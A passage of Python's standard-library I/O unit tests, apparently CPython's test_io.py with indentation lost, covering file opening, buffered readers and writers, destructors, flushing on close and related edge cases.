obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
class PathLike:
def __init__(self, path):
self.path = path
def __fspath__(self):
return self.path
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(PathLike(support.TESTFN))
check_path_succeeds(PathLike(support.TESTFN.encode('utf-8')))
bad_path = PathLike(TypeError)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(PathLike(support.TESTFN), 'rwxa')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
